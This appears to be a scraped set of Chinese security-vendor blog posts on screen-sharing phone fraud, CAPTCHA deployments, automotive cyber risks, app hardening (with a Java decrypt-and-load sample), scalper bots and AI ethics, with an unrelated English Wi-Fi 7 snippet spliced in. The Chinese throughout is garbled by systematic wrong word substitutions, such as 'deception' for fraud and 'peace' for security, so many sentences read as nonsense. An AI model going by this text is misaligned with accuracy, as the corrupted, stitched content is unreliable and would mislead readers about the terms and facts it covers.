“屏幕共享”在视频会议、手游直播等场景下有着广泛应用。 作为互联网技术利用场景之一，“屏幕共享”通过网络，将本设施的屏幕信息实时投射分享到另一个台设施，蕴含屏幕App、弹框显示短信、微信、其余App推送、输出账号密码、解锁的过程、其余实时操作动静等屏幕上显示的所有内容。 电信欺骗分子利用“共享屏幕”施行欺骗本来是为用户不便分享的性能，却成为欺骗份子的牟利的伎俩。2021年4月，国家反诈核心发现，有不法份子利用软件“屏幕共享”性能施行欺骗。 在辽宁大连务工的耿女士接到一名自称“大连市公安局民警”的电话，称其涉嫌广州一起欺骗案件，让她跟广州警方对接。耿女士在加上所谓的“广州警官”的微信后，这位“警官”便给耿女士发了“通缉令”，并要求耿女士配合考察，否则将给予“强制措施”。随后，对方与耿女士视频，称因办案须要，要求耿女士提供“保证金”，并将所有贷款都集中到一张银行卡上，再把钱转到“平安账户”。 期间，通过“屏幕共享”，对方把握了耿女士银行卡的账号和明码。耿女士先后跑到多家银行，取出现金，将钱全副存到了一张银行卡上。正当她打算依照对方批示，进行下一步转账时，被民警及时赶到劝阻。在得悉耿女士泄露了银行卡号和明码后，银行工作人员立刻帮忙耿女士批改了明码，侥幸的是，银行卡的近6万元钱没有受到损失。 电诈分子的行骗步骤顶象进攻云业务平安情报中心剖析发现，骗子往往假冒“公检法”或登记校园贷款的银行工作人员、平台客服人员等，诱导受害者应用网络会议视频内的“分享屏幕”性能。一旦受害人应用此性能，即便欺骗份子不被动询问，也能看到受害人手机上的所有信息，包含输出明码时跳动的字符、收到的验证码等，从而转走受害人卡内资金。 综合来看次要有四步： 第一步，获取信息，骗取信任。不法份子利用非法渠道获取受害者信息，通过假冒公检法、购物平台客服或登记校园贷工作人员，精确匹配受害者本身状况，骗取信任。 第二步，诱骗受害者开启“屏幕共享”。通过某些App（QQ、腾讯会议、钉钉等）自带的屏幕共享性能，不法份子可能实现实时监控事主手机的所有操作。 第三步，登陆网银，实时监控短信验证码。不法份子先以指引操作为由，让事主下载App并关上屏幕分享性能，再利用事主之前走漏的银行卡号，随即登录网银进行转账操作，实时监控事主收到的短信验证码。 第四步，盗取钱财。不法份子先是哄骗受害人被动进行转账，如果受害人发现被骗，或者踌躇，便通过偷偷截获的验证码，进行转账操作，在受害人毫无知觉的状况下，将资金转走。 App如何防备“屏幕共享”的危险在安卓设施中，“屏幕共享”是通过MediaProjection这个服务进行实现的。MediaProjection是一个安卓5.0零碎以上版本中，为开发者截屏或者录屏的一种技术。使用者申请应用MediaProjection服务时，安卓零碎会弹出权限申请框，使用者点击“确认”后能力开始屏幕共享或录屏。 顶象设施指纹可能实时发现钉钉、腾讯会议等App的屏幕共享调用，并第一工夫收回警报，揭示用户注意安全。 当启动MediaProjection的时候，零碎会主动呈现一个虚构显示器，顶象设施指纹就会监测发现多出的这个显示界面，确定设施处于“屏幕共享”状态，并立刻上报至风控核心。风控核心就会下达警报，揭示操作人面临危险，注意安全。 使用者如何防备“屏幕共享”危险“屏幕共享”正混合各种形式多样的欺骗呈现，其最初一步都是让受害者应用或下载能够提供“屏幕共享”性能的网络视频会议软件，目标就是偷窥用户手机上的操作取得银行账号密码等要害信息。 1、未经确认状况下，千万不要随便关上安卓手机的“屏幕共享”性能。 2、陌生人发来的“屏幕共享”邀约间接敞开，不要和陌生人应用“屏幕共享”性能，对方能看见你的所有操作，包含输出明码 3、波及私人信息，特地是银行卡明码、验证码时肯定要审慎、审慎再审慎，不要向任何陌生人走漏。 顶象设施指纹为什么能防备“屏幕共享”？顶象设施指纹反对安卓、iOS、H5、公众号、小程序，可无效侦测模拟器、刷机改机、ROOT越狱、劫持注入等危险，具备疾速反抗、高效危险辨认、99%以上稳定性和100%的唯一性的特点。 作为是顶象进攻云的一部分，顶象设施指纹独有三大能力。 第一，疾速反抗能力。业务利用裸露在互联网上，黑灰产则是暗藏在背地，所以攻防必然存在肯定的滞后性，这就要求设施指纹技术在面对新的攻击方式和危险特色时，有及时的危险情报感知和防控降级的能力，后盾能够联合各行业的攻防教训和危险数据积淀，通过云+端的形式，进行疾速的攻防降级，在一个攻防周期内解决掉业务危险。 第二，高效危险辨认能力。设施指纹须要具备对设施根底环境和运行期的平安检测能力，能精准辨认模拟器、root、越狱、调试、代码注入、多开、VPN代理等危险。例如，iOS平台hook、越狱行为，安卓root、debug、内存dump、注入、多开、模拟器、破绽攻打等危险行为，WEB平台下浏览器色彩深度、分辨率，浏览器与零碎、UA的匹配性和一致性、cookie是否禁用等行为。 第三，99%以上稳定性和100%的唯一性。设施指纹本身SDK代码须要进行爱护，避免采集逻辑被破解和呈现数据伪造，从数据采集源头上保障真实性和准确性。不论对设施参数进行篡改伪造（篡改IMEI、MAC地址、AndroidId、SIM卡信息、机型、品牌等），或是禁用、革除缓存和cookie，设施指纹都要放弃不变，稳定性至多要放弃在99%以上。任意两台设施的指纹不能雷同，不产生碰撞，为每一台设施生成的设施指纹ID须要寰球惟一，并且不可被篡改，唯一性上要保障在100%。 业务平安大讲堂：立刻报名 业务平安产品：收费试用 业务平安交换群：退出畅聊

网络招聘行业作为人才输送的高速路，为产业降级、科技翻新提供人才活血。截止2020年年底，曾经有4.5万多家各类人力资源服务机构，建设了1.8万多个网站，2020年服务各类人群超过10亿人次，为5000多万家单位提供人力资源服务，通过网络公布的岗位招聘信息超过16亿条，公布的求职信息超过8亿条。顶象 作为深圳市人才团体有限公司协同上司人才公共服务平台深圳市人才服务中心全力打造的掌才易云招聘平台，以招聘服务为入口的人力资源一体化公共服务平台。平台以“基地+平台+待业服务站点”相结合的模式，建设合作网络，推出线上获取信息、线下落地服务的新型模式，搭建 O2O 待业服务网络，将线上线下招聘服务进行深度整合，构建招聘用工服务生态系统。 2022年，深圳人才网·掌才易云招聘平台推出”推出“公益招聘流动应届毕业生专场”流动，为宽广高校毕业生来深发展、待业拓宽求职路。流动吸引了100多家企业家参加，提供了技术、研发、经营、各类储备治理岗位等1896招聘岗位，为毕业生更无效地找到适宜的工作，加重毕业生待业压力。 为拓宽招聘渠道，无效发展招聘业务工作，深圳人才网·掌才易云招聘平台还策动发展了“直播带岗”线上流动，加深人才对企业的理解，吸引各地人才在线应聘，从而突破工夫和空间壁垒，进步企业招聘效率和人才求职成功率。 保障招聘信息安全宏大的机构、数量泛滥的网络、海量的信息数据资源为各行各业做好待业工作提供了重大的撑持，与此同时，信息网络的平安的重要性也日益突显。为了保障保障用户和企业的平安，无效避免虚伪信息和欺诈行为产生，确保招聘信息的真实性和准确性，深圳人才网·掌才易云招聘平台选用了顶象无感验证验证码，作为用户注册登录身份验证的工具，在进步用户应用体验的同时，也无效保障了账户的平安。 顶象无感验证是集智能验证码服务、验证决策引擎服务、设施指纹服务、人机模型服务为一体的云端交互平安验证零碎，可能智能剖析与事后断定操作者是非法用户还是仿冒者，对于非法用户，免验证即通过；对于异样用户，依据潜在危险等级进行二次验证或间接拦挡。在保障业务平安的同时也晋升了用户应用体验，最大水平缩小对用户的烦扰。此外，它可能辨认各种攻击行为，无效保障用户账户的平安。 深圳人才网·掌才易云招聘平台的抉择，彰显了其对于技术创新和用户体验的一直谋求和改善，也为其余平台提供了一个可行的抉择和借鉴。 网络招聘向多元化倒退统计数据显示，2020年我国人力资源服务行业市场规模已达到3694亿元，而中高端人才访寻行业市场规模约895.8亿元。随着电商、直播行业的倒退，激发了更多企业的参加激情，并且一直有新企业进入相干畛域疾速倒退，这也为更多的求职者提供就业机会。 招聘行业的外围其实就是效率，很多求职者为了能疾速找到适合的工作，往往可能会海投简历，而企业收到大量有效的简历，须要逐个去甄别适合的人选，会导致效率极低，而当招聘行业可能进步企业与人才之间匹配的精确度后，对三方的效率都将能大大晋升。 随着互联网与产业经济的深度交融，以及5G技术和翻新的推动，在线招聘行业或将产生非接触式行业“量变”，“信息视频化，视频超高清化”将成为将来倒退新方向之一。 业务平安大讲堂：立刻报名 业务平安产品：收费试用 业务平安交换群：退出畅聊

Wallys|Wi-Fi 7 SoC chip • Alder / BellsIPQ9574 / IPQ9554 / IPQ9514|IPQ9570 / IPQ9550 / IPQ9510 Wi-Fi 7 explainedWiFi 7 is the upcoming WiFi standard, also known as IEEE 802.11be Extremely High Throughput (EHT). It works across all three bands (2.4 GHz, 5 GHz, and 6 GHz) to fully utilize spectrum resources. While WiFi 6 was built in response to the growing number of devices in the world, WiFi 7's goal is to deliver astounding speeds for every device with greater efficiency. If you're struggling with constant buffering, lag, or congestion, a WiFi 7 router may be your best solution. ...

近日，钻研机构Upstream公布了《2023年寰球汽车行业网络安全报告》，报告数据显示：在过来5年中，寰球汽车行业因为网络化攻打造成的损失超过5000亿美元，而近70%的汽车平安威逼由远距离的网络攻击引发。攻击者不须要在车辆左近，只有可能连贯到车辆的网络系统，就能够发动攻打。 报告显示，2022年网络攻击者最常应用的载体别离是近程信息处理和应用服务（35%）、近程无钥匙进入零碎（18%）、电子管制单元（14%）、车载智能利用API（12%）、车载信息娱乐零碎（8%）、车载挪动应用程序（6%）和电动汽车充电零碎及设施（4%）。 最易受到网络攻击的汽车组件单元近程信息处理和应用服务。是指通过车辆联网技术（V2X），实现车辆与互联网之间的交互和数据共享，从而为车主提供近程管制、故障诊断保护、导航、保险以及平安服务，次要由车载终端、通信网络和数据处理和存储系统组成。 车载终端蕴含GPS、摄像头、雷达、车速传感器等，采集车速、地位、行驶路线、环境条件等多种数据，对车辆外部的各种数据进行采集、存储和传输。 通信网络是连贯车载终端和近程服务器之间的网络，能够实现车载数据的近程传输和替换。次要包含以4G/5G、WIFI等为代表的挪动通信网络和以Ethernet、CAN等为代表的车内网络，也能够应用云服务器进行数据传输和解决。 数据处理和存储系统包含数据存储设备、数据处理软件、报警零碎等，负责对车载的数据进行解决和存储，在此基础上实现车辆的诊断、管制和治理等性能。 近程无钥匙进入零碎。汽车的近程无钥匙进入零碎是指通过车辆联网技术，是一项重要的汽车电子技术。该技术无需应用传统的钥匙或者钥匙卡，通过手机App就能够实现近程开启车门、启动汽车的性能。其次要由车载传感器、管制单元和车辆通信模块组成。 其中，车载传感器能够在车辆周围环境中检测手机号码、蓝牙设施到存在的近程信号，以便在近程信号触发后进行相应的操作。 管制单元能够接管车载传感器收回的信号，对指令做出相应的判断，并进行车辆引擎启动、车门解锁等动解决。而车辆通信模块能够与挪动通信网络或互联网进行连贯，以便实现与近程无钥匙进入零碎通信和数据交换。 电子管制单元。汽车的电子管制单元是指汽车中用于管制和治理其各项电子系统和部件的计算机芯片，是古代汽车中十分重要的组成部分，次要由发动机管制单元、制动防抱死系统控制单元、前照灯自适应控制单元、空调系统控制单元、能源转向系统控制单元等系统控制模块组成。通过对发动机、制动零碎、照明零碎、音响系统、车内环境、座舱等电子系统的准确管制，保证车辆行驶的安全性，进步了车辆应用的便捷性和舒服水平。 发动机管制单元通过对发动机燃油喷射、点火时序、氧气传感器数据等进行计算和管制，实现优化发动机性能和燃油效率的目标；制动防抱死系统控制单元通过对车轮转速和刹车操作进行计算和管制，实现最大限度地防止制动时车轮抱死或者打滑，进步制动零碎的效率和安全性；前照灯自适应控制单元通过感知并辨认车辆行驶的路况及其它车辆的状况，并对前照灯的亮度、方向进行计算和管制，以进步夜间驾驶安全性。 车载挪动应用程序和智能利用API。汽车的车载挪动应用程序是指能够在汽车零碎中运行的应用程序，其目标是为了加强车辆的性能和娱乐性，并提供更加便捷、智能的驾驶体验，蕴含音频媒体、导航、地位、天气、资讯、邮件、车辆诊断、车辆管制等应用服务。而车载智能利用API是指为汽车中的各种智能利用提供标准化接口和开发平台，使第三方开发者可能开发出更加智能、便捷和适宜用户需要的汽车利用API。 充电零碎及设施。电动汽车充电零碎及设施是指提供给电动汽车进行充电的各种设施和设施，包含充电设施、充电桩、充电接口、充电线缆等组成部分。 汽车面临的五类常见危险近程入侵危险。通过网络攻击、恶意软件等伎俩入侵汽车联网零碎，从而实现对汽车的近程管制和操纵。例如，管制车辆行驶方向、管制刹车等接管车载管制单元、毁坏传感器和嵌入式设施、拦挡通信、劫持信号等，导致车辆失去管制或造成重大事故等。 数据安全危险。汽车网络和零碎收集了大量车辆数据，包含车内环境、驾驶行为、隐衷信息等，如果这些数据被非法获取、泄露或被用于其余不当用处，会造成很大的影响，甚至带来集体财产损失、声誉损失等问题。 恶意软件攻打危险。恶意软件攻打是指黑客通过植入恶意代码等形式，在汽车联网零碎中执行歹意操作以达到毁坏、抢劫等目标。例如利用破绽进行木马攻打、勒索病毒等攻击方式。 DDoS攻打危险。DDoS攻打是指分布式拒绝服务攻打，攻击者利用大量的计算机或其余网络设备向指标服务器或网站动员大量申请，占用指标资源使其无奈失常服务。当车辆与互联网连贯时，也会面临DDoS攻打的危险，从而导致车联网零碎生效，给驾驶员和乘客带来微小平安危险。 业务平安危险。仿冒山寨汽车App，窃取盗用汽车消费者账号，遭哄抢窃取官网商城积分福利，歹意爬取汽车信息图片交易点评，伪造材料骗取汽车贷款等，给车企、经销商和消费者带来不同的危险。 业务平安大讲堂：立刻报名 业务平安产品：收费试用 业务平安交换群：退出畅聊

目前加固对于App开发人员来说，不论是App Store的审核4.3问题，还是为了避免逆向工程、篡改、反编译等问题，加固都算是一个必备的抉择了。 然而加固技术在一步步降级的同时，其固有的平安缺点和兼容性问题却始终未能失去解决。 目前，加固技术曾经倒退到第五代--虚机源码爱护，应用代码类型更宽泛，App爱护级别更高，兼容性更强。那么，这一波技术升级，能解决下面的平安和兼容性问题吗？咱们先挨个看看各代技术的劣势和缺点吧。 第一代加固技术：动静加载第一代加固技术中的动静加载性能通常被用于爱护应用程序中的外围代码，以及避免歹意攻击者对代码进行反编译、逆向工程等操作。动静加载性能通常包含以下几个步骤： 1.加密：将应用程序中的外围代码进行加密解决，以避免歹意攻击者对代码进行解密操作。 2.动静加载：在应用程序启动时，动静加载器会将加密后的代码加载到内存中，并对其进行解密操作。 3.代码完整性检查：在加载代码后，动静加载器会对代码进行完整性检查，以确保代码没有被篡改或批改。 4.运行时爱护：在利用程序运行期间，动静加载器会对代码进行爱护，以避免攻击者利用破绽对代码进行攻打或批改。 外围代码用Java代码简略写了一个动静加载的外围代码： import java.io.File;import java.io.FileInputStream;import java.security.MessageDigest;import javax.crypto.Cipher;import javax.crypto.spec.SecretKeySpec;public class DynamicLoader { private static final String KEY = "mysecretkey"; // 加密密钥 private static final String FILE_PATH = "/path/to/encrypted/code"; // 加密后的代码文件门路 private static final String MD5_CHECKSUM = "1234567890abcdef1234567890abcdef"; // 加密前的代码的MD5校验和 public static void main(String[] args) throws Exception { byte[] encryptedCode = loadEncryptedCode(); // 加载加密后的代码 byte[] decryptedCode = decrypt(encryptedCode); // 解密代码 checkCodeIntegrity(decryptedCode); // 查看代码完整性 runCode(decryptedCode); // 运行代码 } // 加载加密后的代码 private static byte[] loadEncryptedCode() throws Exception { File file = new File(FILE_PATH); FileInputStream fis = new FileInputStream(file); byte[] buffer = new byte[(int) file.length()]; fis.read(buffer); fis.close(); return buffer; } // 解密代码 private static byte[] decrypt(byte[] encryptedData) throws Exception { Cipher cipher = Cipher.getInstance("AES"); SecretKeySpec keySpec = new SecretKeySpec(KEY.getBytes(), "AES"); cipher.init(Cipher.DECRYPT_MODE, keySpec); return cipher.doFinal(encryptedData); } // 查看代码完整性 private static void checkCodeIntegrity(byte[] code) throws Exception { MessageDigest md = MessageDigest.getInstance("MD5"); byte[] checksum = md.digest(code); String hex = bytesToHex(checksum); if (!hex.equals(MD5_CHECKSUM)) { throw new Exception("Code has been modified"); } } // 运行代码 private static void runCode(byte[] code) throws Exception { // 通过反射执行代码 Class<?> clazz = new MyClassLoader().defineClass(null, code, 0, code.length); clazz.getDeclaredMethod("run").invoke(null); } // 将字节数组转换为十六进制字符串 private static String bytesToHex(byte[] bytes) { StringBuilder sb = new StringBuilder(); for (byte b : bytes) { sb.append(String.format("%02x", b)); } return sb.toString(); } // 自定义ClassLoader，用于加载解密后的代码 private static class MyClassLoader extends ClassLoader { public Class<?> defineClass(String name, byte[] code, int off, int len) { return super.defineClass(name, code, off, len); } }}PS0：因为动静加载的实现形式可能因操作系统等因素而异，以上代码示例仅供参考，不能间接用于理论利用。（本人依据需要更改） ...

3月21日，OPPO公布全新影像旗舰Find X6系列。该系列定义为“全主摄”，手机摄像头均采纳大底传感器技术与当先行业的光学设计，领有旗舰级的光线捕获性能。 暗光长焦体验是OPPO Find X6 系列旗舰手机的重要卖点，广角、长焦、超广角三颗摄像头均采纳大底传感器技术，其中长焦摄像头采纳1/1.56英寸大底传感器，以及行业首个F2.6大光圈的潜望式光学模组。无论白天还是夜晚，无论远景还是近景，OPPO Find X6系列都能够轻松创作出超过设想的影像作品。 Find X6系列提供多种配色计划，以及素皮和玻璃两种材质抉择，其中Find X6 Pro领有大漠银月、云墨黑、飞泉绿三款色调，售价5999元起；Find X6领有飞泉绿，星空黑，雪山金三款色调，售价4499元起。系列新款手机自公布日16点起，在OPPO商城开启全面起售。 “黄牛党”瞄准OPPO新手机品牌手机的官网商城是新款手机首发渠道，始终是“黄牛党”关注的焦点。 在一些网店、社群、论坛里，不少“黄牛党”推出了代抢OPPO Find X6手机的服务，每次代抢服务费高达几百元，甚至千元，并且还明确标注了要求：“抢不到并不退全款，只反对退局部款项。对于很多一般消费者而言，在本人无奈购买到OPPO Find X6手机的状况下，或者也会有不少消费者逼上梁山，购买此类代抢购服务。 线上商城的抢购须要拼速度。同样一件商品，A下单比早1秒钟，则A可能买到，B则无奈购买到。“黄牛党”通过编写制作自动化的软件，可能进行批量注册登录抢购等操作，从而实现疾速、刹时、批量的、对指定商品、服务进行哄抢，抢购速度和成功率远远高于一般消费者。但这样的“代抢购”服务不仅违反了偏心准则，更无奈确保消费者的权利。 此外，还有很多不法团伙，制作歹意网络爬虫，通过自动化的形式疾速获取官网商城的商品信息、价格和库存状况等相干数据信息，甚至进行盗图和模拟造假等行为。这不仅会影响商城的品牌形象，还会导致商城的生存和倒退受到极大的挑战，更可能使消费者购买到的商品蒙受损失。 无感验证护航商城经营为了防备“黄牛党”和歹意网络爬虫的潜在危险，OPPO商城与顶象达成单干，部署顶象无感验证。无感验证可能防备机器批量注册和“黄牛党”的抢购，拦挡歹意网络爬虫的盗取行为，护航商城经营秩序。 顶象无感验证以进攻云为外围，集13种验证形式，多种防控策略，以智能验证码服务、验证决策引擎服务、设施指纹服务、人机模型服务为一体的云端交互平安验证零碎。其会集了4380条危险策略、112类危险情报、笼罩24个行业、118种危险类型，防控精准度>99.9%，1天内便可实现从危险到情报的转化，行业危险感知能力实力增强，同时反对平安用户无感通过，实时反抗处理能力更是缩减至60s内。 无感验证最大水平缩小对用户的烦扰，在保障业务平安的同时也晋升了用户应用体验。无效晋升商城的安全性、稳定性，为消费者带来更多的优质服务。 业务平安大讲堂：立刻报名 业务平安产品：收费试用 业务平安交换群：退出畅聊

近两周，AI频频占据头条。 “用三秒实现我一天的活。”ChatGPT为中国泛滥的小型、产业链散布绵长的跨境电商企业升高了取得定制化计划的老本。许多商家置信，ChatGPT还能解决大量的财务报表和数据分析模型，这也宽广跨境电商不须要再花钱延聘内部开发机构，建个小程序、做个客服机器人等小型需要能够通过GPT-4的全场景利用来实现，跨境卖家无望通过ChatGPT升高人力和资本老本。 先是ChatGPT降级到GPT-4，性能变得更弱小；随后微软在office中引入最新的GPT-4，给办公带来新变动；紧接着百度公布文心一言，引发宽泛热议；就在前天，驰名的AI绘画工具Midjourney也更新了最新版本，真切形象的生成成果让人惊呼“可怕”。 据媒体报道，很多AI艺术生成图像无奈正确渲染手部，例如，可能会呈现7-10个手指的状况，而Midjourney v5可能很好地生成真切的人手。国外有网友间接用Midjourney V5画出了The Matrix的电影质感，让人狐疑是电影里的截图；国内有网友试玩，间接画出了一对中国情侣，视觉碾压人类画师。 AI利用曾经来到咱们身边，与此同时，新危险也在悄悄来临。 ChatGPT们带来的新危险科技是倒退的利器，也可能成为危险的源头。随着AI利用的门槛升高，被不法者利用后，ChatGPT、Midjourney带来的危险才刚刚开始。 合成假文章。在美国纽约从事销售工作的布雷特·希克勒利用ChatGPT，在数小时内写出了一本30页带插图的儿童电子书《聪慧的小松鼠：储蓄和投资的故事》，这本书于1月通过亚马逊自营网站发售，目前已帮他赚了上百美元。往年2月份，出名科幻杂志《 Clarkesworld Magazine》发表，因为近期收到大量由ChatGPT生成的科投稿，决定临时敞开投稿渠道。《 Clarkesworld Magazine》杂志编辑 Neil Clarke 示意，近期收到了大量由 ChatGPT生成的科幻故事投稿，“2022年10月有25篇，到了往年1月达到100篇，2月份居然收到500篇”。ChatGPT正威逼“真正的”作家的谋生，随之而来的剽窃、大量低质内容泛滥等问题引起关注。 合成假视频。2020年9月，女演员艾玛·沃特森Emma Watson的30秒换脸视频在色情网站上播放超过2300万次。不法分子将AI换脸技术用于色情流传，女明星是“重灾区”。通过深度伪造技术，还能够实现视频/图像内容中人脸的替换，甚至可能通过算法来操纵替换人脸的面部表情。 生成假新闻。2月17日，网络疯传一条对于杭州市政府3月1号勾销限行的“新闻”。假相是：杭州某小区业主群探讨ChatGPT，一位业主开玩笑说尝试用它写篇杭州勾销限行的新闻稿，随后在群里直播了应用ChatGPT的写作过程，还把文章发在群里。有些业主不明就里，截图转发，导致属实信息被广泛传播。 制作假材料。因为ChatGPT可能产出高质量的人类书面语文本，其可被用来进行网络坑骗，比方通过写出看上去非法的电子邮件内容来施行财产欺骗，通过制作假的政策文件、政府公文来进行信息欺诈。其外围是依照使用者要求主动模拟有固定模式的文本内容。例如，利用AI生成虚伪的照片、虚伪证件、虚伪公司网站、虚伪流水账单、虚伪招商文件等。 生成假文案。某个博主在写道，用ChatGPT写XXX（某社交媒体）文案，又快又好。以前我写一篇笔记，构思，打草稿，排版至多需1个小时。在ChatGPT的帮忙下，20分钟就能创作一篇有品质的文章，效率晋升了3倍。在社交平台的席卷下，人人皆可创作，内容的庞杂与劣质、流传的失真与不确定性，都一再被诟病，AI的高效率会让信息池更加芜杂。 “不苟言笑地胡言乱语”。往年1月，一位中国网友因为导师要与他探讨ChatGPT的话题，于是让ChatGPT写几篇论文看看。后果，ChatGPT“假造了三篇论文，题目作者概要啥都有，看上去跟真的似的”。最初，ChatGPT抵赖了这几篇论文都是假的。往年2月，另一名网友想通过ChatGPT查问文献资料，也遭逢假论文。他发微博示意：“我想要查的钻研方向都有文献证据，提到具体文献给我编提供不了DOI但有作者和期刊页码信息，一查好家伙全是假的。”有网友让ChatGPT背一下大家熟知的《观沧海》这首诗，谁晓得它并没有答复曹操的那首驰名的诗，而是本人即兴创作了一首。也有人让ChatGPT做一道小学数学题，它却写出了一长串极其简单的计算过程，而最初给出的却是谬误答案。 ChatGPT不仅存在事实性谬误、常识盲区和常识偏差等诸多问题，还有面临训练数据起源合规性、数据应用的偏见性、版权盗用等人工智能通用危险。 AI带来三方面伦理危险“智人借助GPT降级为半智神，有没有GPT加持，当前就是两个物种了”，技术创业者大川如实说。善用人工智能工具的技术人员，生产效率和速度将大幅提高，而无奈应用工具的技术人员效率相比拟更低，由此加剧马太效应，让强人愈强、弱者愈弱。 所以，AI利用是一把“双刃剑”，对现有社会构造及价值观念的冲击亦愈发显著，对人类社会的尊严、偏心、正义等价值观带来新的挑战。 一是带来人工智能新的偏见与歧视。AI是由研发人员价值观念摆布下设计开发进去的，容易受研发者秉持的价值观念影响。因为年龄、所在地区、从事行业、教育程度等的差别，人们接触人工智能的机会并不均等。马太效应的推动下，会优先晋升取得人工智能加持人群的生产能力和收益，反之亦然，影响社会倒退的公平性。 二是滥用人工智能带来的道德风险。用AI制作假新闻、假消息、假账号、假声音、假图片所带来的社会问题越来越多。这一切都是人工智能滥用带来的危险。 三是人工智能带来新的法律纠纷。相似ChatGPT是在大量不同的数据集上训练进去的大型语言模型，应用受版权保护的资料来训练人工智能模型，可能导致该模型在向用户提供回复时适度借鉴别人的作品，从而引起著作权纠纷。此外，使用者在输出申请时，输出与已辨认或者可辨认的自然人无关的各种信息，容易造成商业秘密泄露，违反窃密任务。 国内上对于AI的标准技术界越来越关注AI带来偏心问题。寰球AI顶级峰会IJCAI、NeurIPS、AAAI上呈现了越来越多的AI伦理论文，话题范畴波及AI可解释性、平安人工智能、隐衷与数据收集、偏心与偏见等。而在近20年以来各个大型AI会议上提及伦理关键字的论文题目的数量都在逐年减少。 牛津大学学者Luciano Floridi和Josh Cowls在2019年哈佛数据迷信评论杂志上发表的文章中提出了现在被学术界广为认可的AI伦理五准则：行善、不挫伤、自治、正义以及算法可解释性。其中，前四项由传统的生物伦理准则沿用而来，最初一项则是针对人工智能算法而提出的新准则。 2019年4月，欧盟委员会公布了正式版的AI道德准则《可信赖人工智能的伦理准则》，提出了实现可信赖人工智能全生命周期的框架。该准则提出，可信赖人工智能需满足3个根本条件： 非法的，即零碎应该恪守所有实用的法律法规。合伦理的，即零碎应该与伦理准则和价值观相一致。持重的，不论从技术还是社会的角度来看，人工智能零碎都可能会造成挫伤。对于人工智能从业者，该准则蕴含四项道德准则： 尊重人的自主性：人类与人工智能零碎之间的性能调配应遵循以人为本的设计准则，并为人类抉择留下有意义的机会。 预防挫伤：人工智能零碎及其运行的环境必须安全可靠，确保不会被歹意应用。弱势群体应失去更多关注。还必须特地留神人工智能零碎可能因为权力或信息不对称而导致或加剧不利影响的状况。 公平性：人工智能零碎的开发、部署和应用必须是偏心的，偏心体现既有实质性的也有程序性的。 可解释性：可解释性对于建设和保护用户对AI 零碎的信赖至关重要，流程须要通明、人工智能零碎的能力和目标须要公开沟通、并且决策（在可能的范畴内）能够向间接和间承受影响的人解释。有时候，解释为什么一个模型产生了一个特定的输入或决策并不总是可能的。这些状况被称为“黑盒”算法，在这些状况下，须要其余可解释性措施，例如，零碎性能的可追溯性、可审计性和通明通信等。 中国AI伦理立法稳步推动2017年7月，我国公布了《新一代人工智能倒退布局》。布局提到，不仅要器重人工智能的社会伦理影响，而且要制订伦理框架和伦理标准，以确保AI平安、牢靠、可控倒退。 2018年1月，在国家人工智能标准化总体组的成立大会上公布了《人工智能标准化白皮书2018》。白皮书阐述了人工智能的平安、伦理和隐衷问题，认为人工智能技术需遵循的伦理要求设定要依靠于社会和公众对人工智能伦理的深刻思考和宽泛共识上，并遵循一些共识准则。 2019年2月，科技部在北京召开新一代人工智能倒退布局暨重大科技我的项目启动会，成立了新一代人工智能治理业余委员会。 2021年9月，国家新一代人工智能治理业余委员会公布《新一代人工智能伦理标准》，提出了增进人类福祉、促成偏心公正、爱护隐衷平安、确保可控可信、强化责任担当、晋升伦理素养等6项根本伦理要求。同时提出人工智能治理、研发、供给、应用等特定流动的18项具体伦理要求。 一是增进人类福祉。保持以人为本，遵循人类独特价值观，尊重人权和人类根本利益诉求，恪守国家或地区伦理道德。保持公共利益优先，促成人机谐和敌对，改善民生，加强取得感幸福感，推动经济、社会及生态可继续倒退，共建人类命运共同体。 二是促成偏心公正。保持普惠性和包容性，切实爱护各相干主体合法权益，推动全社会偏心共享人工智能带来的好处，促成社会公平正义和机会均等。在提供人工智能产品和服务时，应充沛尊重和帮忙弱势群体、非凡群体，并依据须要提供相应代替计划。 三是爱护隐衷平安。充沛尊重个人信息知情、批准等权力，按照非法、正当、必要和诚信准则解决个人信息，保障个人隐私与数据安全，不得侵害集体非法数据权利，不得以窃取、篡改、泄露等形式非法收集利用个人信息，不得侵害集体隐私权。 四是确保可控可信。保障人类领有充沛自主决策权，有权抉择是否承受人工智能提供的服务，有权随时退出与人工智能的交互，有权随时停止人工智能零碎的运行，确保人工智能始终处于人类管制之下。 五是强化责任担当。保持人类是最终责任主体，明确利益相关者的责任，全面加强责任意识，在人工智能全生命周期各环节自省自律，建设人工智能问责机制，不回避责任审查，不回避应负责任。 六是晋升伦理素养。踊跃学习和遍及人工智能伦理常识，主观意识伦理问题，不低估不夸张伦理危险。被动发展或参加人工智能伦理问题探讨，深刻推动人工智能伦理治理实际，晋升应答能力。 技术与伦理如何相辅相成 一项新技术从研发到进入市场，再到融入社会生产、生存，产生危险是难以避免的，不能因为危险而放弃新技术的研发和利用。现实指标应是把危险最小化，把技术获利最大化。这就要求法律和政策做到规制与保障并重。要通过法律与政策伎俩解决人工智能引发的危险，实现有序倒退；同时，要确保AI翻新倒退，更好赋能经济社会。不过，规制与保障之间可能存在价值抵触，规制不当可能扼杀人工智能的翻新倒退，必须审慎地解决好二者之间的关系。 欧盟在标准AI伦理问题上下手早，但其适度监管也给相干市场的倒退带来了限度，造成欧盟在数字产业的倒退上全面落后于寰球。在寰球技术主权强烈竞争的背景下，立法与监管政策须要放弃审慎思考，在治理与倒退之间做好均衡，在不便企业满足AI伦理危险的同时，为企业、行业以及相干产业提供充沛的倒退空间。 为了升高AI伦理执法的难度，一些国家针对特定部门和高风险利用场景独自立法。如许多国家把人工智能零碎在医疗畛域中利用列为须要关注的场景，在这些畛域中，算法产生的后果将间接关乎人类的生命福祉。依照针对不同危险等级制订不同严苛水平的治理思路，能够通过分场景监管，做到有收有放，进而实现治理与倒退的均衡。 在标准伎俩上，应依据AI利用产生危险的起因，有针对性地采纳不同标准伎俩。对滥用人工智能技术引发的危险，则要依附硬性束缚。硬性束缚规定明确，可操作性强，可能为人们如何行为提供具体指引，并且有强制力保障。在标准形式上，强化政府与企业治理协同，相辅相成，互相保障。 业务平安大讲堂：立刻报名 业务平安产品：收费试用 业务平安交换群：退出畅聊

